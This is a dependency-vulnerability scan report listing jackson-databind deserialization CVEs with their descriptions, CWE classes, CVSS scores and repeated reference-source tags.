af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-19362 suppress
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the jboss-common-core class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-14379 suppress
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-14540 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-14892 suppress
A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code. CWE-502 Deserialization of Untrusted Data, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-14893 suppress
A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. An attacker could use this flaw to execute arbitrary code. CWE-502 Deserialization of Untrusted Data, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-16335 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16942 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16943 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-17267 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-17531 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-20330 suppress
FasterXML jackson-databind 2.x before 2.9.10.2 lacks certain net.sf.ehcache blocking. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-8840 suppress
FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-9546 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-9547 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
